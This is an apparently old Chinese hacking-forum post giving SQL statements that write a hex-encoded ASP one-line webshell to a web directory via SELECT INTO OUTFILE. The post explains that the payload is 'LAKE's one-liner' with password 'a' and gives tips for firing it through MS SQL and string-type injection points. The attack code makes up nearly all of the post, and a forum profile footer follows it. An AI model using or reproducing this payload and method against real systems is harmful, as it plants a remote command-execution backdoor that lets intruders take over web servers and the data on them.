Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES(0x3C25657865637574652872657175657374282261222929253EDA);
select cmd from a into outfile 'X:\WEB\1.asp';
Drop TABLE IF EXISTS a;
0x3C25657865637574652872657175657374282261222929253EDA是LAKE的一句话,密码为a
在PHP环境里我成功过,不知道ASP怎么样
MS在注入点后执行的话要加个;
如果是字符型的话还要加多个点'
帖子2 精华0 积分7 阅读权限40 性别男 在线时间2 小时 注册时间2006-8-28 最后登录2008-6-8 查看详细资料引用报告回复 TOP